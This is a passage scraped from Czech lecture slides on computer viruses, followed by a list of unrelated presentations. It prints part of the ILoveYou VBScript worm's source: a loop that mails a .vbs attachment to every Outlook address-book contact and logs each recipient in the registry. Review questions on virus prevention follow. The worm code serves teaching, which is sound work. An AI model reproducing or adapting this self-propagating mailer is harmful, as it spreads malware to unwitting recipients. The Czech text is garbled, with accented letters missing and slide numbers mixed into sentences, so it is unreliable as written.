for ctrlists=1 to mapi.AddressLists.Count set a=mapi.AddressLists(ctrlists) x=1 regv=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a) if (regv="") then regv=1 end if if (int(a.AddressEntries.Count)>int(regv)) then for ctrentries=1 to a.AddressEntries.Count malead=a.AddressEntries(x) regad="" regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\ WAB\"&malead) pokraovn 90 Potaov virus ILoveYou

91 if (regad="") then dokonen set male=out.CreateItem(0) male.Recipients.Add(malead) male.Subject = "ILOVEYOU" male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me." male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs") male.Send regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead,1,"REG_DWORD" end if x=x+1 next regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,

a.AddressEntries.Count else regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a, a.AddressEntries.Count end if next Set out=Nothing Set mapi=Nothing end sub Literatura 92 http://www.viry.cz Mrnutk, J.: Viry 98 vetn makrovir a antivirov ochrany st. Grada Publishing, Praha 1998. Klander, L.: Hacker Proof. Unis Publishing, Brno 1998.

Kontroln otzky Srovnejte virus potaov s virem biologickm. Uvete projevy potaovch vir. Mohou souasn potaov viry pokodit technick vybaven potae? Zstane virus uloen v operan pamti potae i po jeho vypnut? Zstane virus uloen na pevnm disku potae i po jeho vypnut? Uvete zpsoby prevence proti potaovm virm. Uvete klasifikaci potaovch vir podle napadench oblast. Uvete jednotliv typy infiltrac potaovho systmu a strun je charakterizujte. 93 Kontroln otzky

K emu slou antivirov programy? Jakm zpsobem se potaov viry? Pro se z hlediska prevence proti potaovm virm doporuuje zmnit bootovac sekvenci na C:, A:? Proti jakm virm se tmto zpsobem meme ubrnit? Pro se z hlediska prevence proti potaovm virm doporuuje vypnout podporu WSH? Proti jakm virm se tmto zpsobem meme ubrnit? V em spov innost makrovir? Me se virus ILoveYou (Love Letter) it v prosted operanho systmu MS-DOS nebo UNIX? Je pravda, e se formtovnm pevnho disku vdy odstran vechny potaov viry na nm uloen? V em spov nebezpe vir pepisujcch Flash-BIOS? 94

Recently Viewed Presentations

 • Theme

  Theme

  "The Three Little Pigs" START: What topics or big ideas does the story deal with? What is the author saying about one of those topics? END: Put it into a theme statement. The big idea is making smart choices. The...
 • PowerPoint-Präsentation

  PowerPoint-Präsentation

  Most Sensitive Areas for Regional Groundwater Pollution Most sensitive areas by intersecting groundwater recharge areas and areas with major human impact (cultivated land use) Identified areas should be considerated as groundwater sub-bodies for further characterization Areas are very important for...
 • Debbie Rimmer & Karen Swain Recovery College East

  Debbie Rimmer & Karen Swain Recovery College East

  Debbie Rimmer & Karen Swain Recovery College - East Sussex 13 September 2016 Presentation: The East Sussex Strategic Partnership (ESSP) Assembly
 • 27. Infections of The Upper Respiratory Tract

  27. Infections of The Upper Respiratory Tract

  INFECTIONS OF THE UPPER RESPIRATORY TRACT They are among the most common reasons for visits to primary care Providers the illnesses are typically mild Even though the minority (~25%) of cases are caused by bacteria, URIs are the leading diagnoses...
 • My Title - U.S. National Library of Medicine

  My Title - U.S. National Library of Medicine

  This content is written for a U.S. audience and contains information specific to U.S. medications and practice guidelines. It's of great use to healthcare providers & information intermediaries, because we link to the document in the language, such as Italian,...
 • BUEC 280 Lecture 4 - Simon Fraser University

  BUEC 280 Lecture 4 - Simon Fraser University

  ECON 381 Compensating differentials * * * * * * * * We have talked about how workers care about non-wage job characteristics We also talked about the "fixed wage" model, in which the straight-time wage adjusts to offset the...
 • Technické vybavení počítačů - Masaryk University

  Technické vybavení počítačů - Masaryk University

  * * Základní deska (2) vyrovnávací cache paměť rozšiřující sběrnici sloty umístěné na rozšiřující sběrnici pro připojení rozšiřujících karet ROM BIOS CMOS paměť akumulátor zálohující CMOS paměť hodiny reálného času řadič klávesnice nastavovací propojky (jumpers), popř. nastavovací přepínače (switches ...
 • Recipe Parts - Winston-Salem/Forsyth County Schools

  Recipe Parts - Winston-Salem/Forsyth County Schools

  Recipe Parts What's Missing? Part 1--Yield Tells the number and size of servings the recipe will make. Helps you know if you need to make more or less food. Part 2—Ingredients and Amounts Ingredients are listed in the exact amounts...